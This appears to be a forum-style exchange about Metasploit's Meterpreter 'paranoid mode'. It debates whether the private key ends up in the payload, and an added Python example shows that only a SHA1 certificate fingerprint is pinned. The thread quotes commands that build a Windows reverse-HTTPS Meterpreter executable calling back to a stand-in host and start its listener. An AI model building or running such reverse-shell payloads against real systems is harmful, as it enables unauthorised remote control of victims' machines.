https://github.com/rapid7/metasploit-framework/wiki/Meterpreter-Paranoid-Mode has instructions:
$ openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 \
-subj "/C=US/ST=Texas/L=Austin/O=Development/CN=www.example.com" \
-keyout www.example.com.key \
-out www.example.com.crt && \
cat www.example.com.key www.example.com.crt > www.example.com.pem && \
rm -f www.example.com.key www.example.com.crt
$ ./msfvenom -p windows/meterpreter_reverse_https \
    LHOST=www.example.com LPORT=443 \
    PayloadUUIDTracking=true PayloadUUIDName=ParanoidStagedStageless \
    HandlerSSLCert=./www.example.com.pem StagerVerifySSLCert=true \
    -f exe -o launch-paranoid-stageless.exe
$ ./msfconsole -q -x 'use exploit/multi/handler; set PAYLOAD windows/meterpreter_reverse_https; set LHOST www.example.com; set LPORT 443; set HandlerSSLCert ./www.example.com.pem; set IgnoreUnknownPayloads true; set StagerVerifySSLCert true; run -j'
That makes no sense. It embeds not only the cert, but also the private key, in the payload. As soon as the blue team finds one copy of the payload anywhere, the blue team gets the key, and gains the ability to impersonate the red team's C2 server and capture all the other running copies of the payload.
It embeds not only the cert, but also the private key, in the payload.
Nope, sorry, not even close. No keys are embedded in the payload, at all. The only thing that's embedded is the SHA1 fingerprint.
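As an added illustration of the point above (this is example code written for this page, not Metasploit's own implementation), the following reads a combined PEM of the kind the wiki's openssl command produces, ignores every block that is not a CERTIFICATE, and computes the SHA1 fingerprint of the certificate's DER encoding. That fingerprint is the only thing derived from HandlerSSLCert that ends up in the payload; the stager's check is then a plain fingerprint comparison against the certificate the handler presents. The key and certificate bytes below are constructed stand-ins so the example runs offline, not real key material.

```python
# Added example, not Metasploit code: what "paranoid mode" pins and checks.
import base64
import hashlib
import re

# Matches one PEM block; the label is captured so key blocks can be skipped.
PEM_BLOCK = re.compile(
    r"-----BEGIN ([A-Z ]+)-----\s*(.*?)\s*-----END \1-----", re.S
)


def pem_blocks(pem_text):
    """Yield (label, der_bytes) for each PEM block in the text."""
    for label, body in PEM_BLOCK.findall(pem_text):
        yield label, base64.b64decode("".join(body.split()))


def has_private_key(pem_text):
    """True if the file carries any private-key block (the wiki's PEM does)."""
    return any("PRIVATE KEY" in label for label, _ in pem_blocks(pem_text))


def cert_fingerprint(pem_text):
    """SHA1 over the DER of the first CERTIFICATE block, as lowercase hex.

    Private-key blocks in the same file are never read, so passing the
    combined PEM to msfvenom leaks nothing beyond this fingerprint.
    """
    for label, der in pem_blocks(pem_text):
        if label == "CERTIFICATE":
            return hashlib.sha1(der).hexdigest()
    raise ValueError("no CERTIFICATE block in PEM")


def stager_accepts(presented_cert_der, pinned_fingerprint):
    """The stager's check: does the handler's certificate match the pin?"""
    return hashlib.sha1(presented_cert_der).hexdigest() == pinned_fingerprint


# Constructed sample input: stand-in bytes, not a real key or certificate.
FAKE_KEY_DER = b"constructed-stand-in-for-the-RSA-private-key-DER"
FAKE_CERT_DER = b"constructed-stand-in-for-www.example.com-certificate-DER"


def _pem(label, der):
    """Wrap DER bytes in a PEM block with 64-column base64 lines."""
    b64 = base64.b64encode(der).decode()
    lines = [b64[i:i + 64] for i in range(0, len(b64), 64)]
    return f"-----BEGIN {label}-----\n" + "\n".join(lines) + f"\n-----END {label}-----\n"


# Same layout as `cat www.example.com.key www.example.com.crt > www.example.com.pem`
COMBINED_PEM = _pem("PRIVATE KEY", FAKE_KEY_DER) + _pem("CERTIFICATE", FAKE_CERT_DER)
CERT_ONLY_PEM = _pem("CERTIFICATE", FAKE_CERT_DER)


if __name__ == "__main__":
    pin = cert_fingerprint(COMBINED_PEM)
    print("file has private key:", has_private_key(COMBINED_PEM))
    print("pinned fingerprint  :", pin)
    print("same pin from cert-only PEM:", cert_fingerprint(CERT_ONLY_PEM) == pin)
    print("handler with right cert accepted:", stager_accepts(FAKE_CERT_DER, pin))
    print("impostor cert accepted        :", stager_accepts(b"other-cert", pin))
```

On a real www.example.com.pem, `openssl x509 -in www.example.com.pem -noout -fingerprint -sha1` prints the same SHA1 (colon-separated), which is a quick way to confirm that what the payload carries can be recomputed from the public certificate alone.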
Oops, sorry, I was deceived by the symmetric commands. I.e. HandlerSSLCert for both msfvenom and msfconsole with the full pem file (containing the key) passed as an argument for both.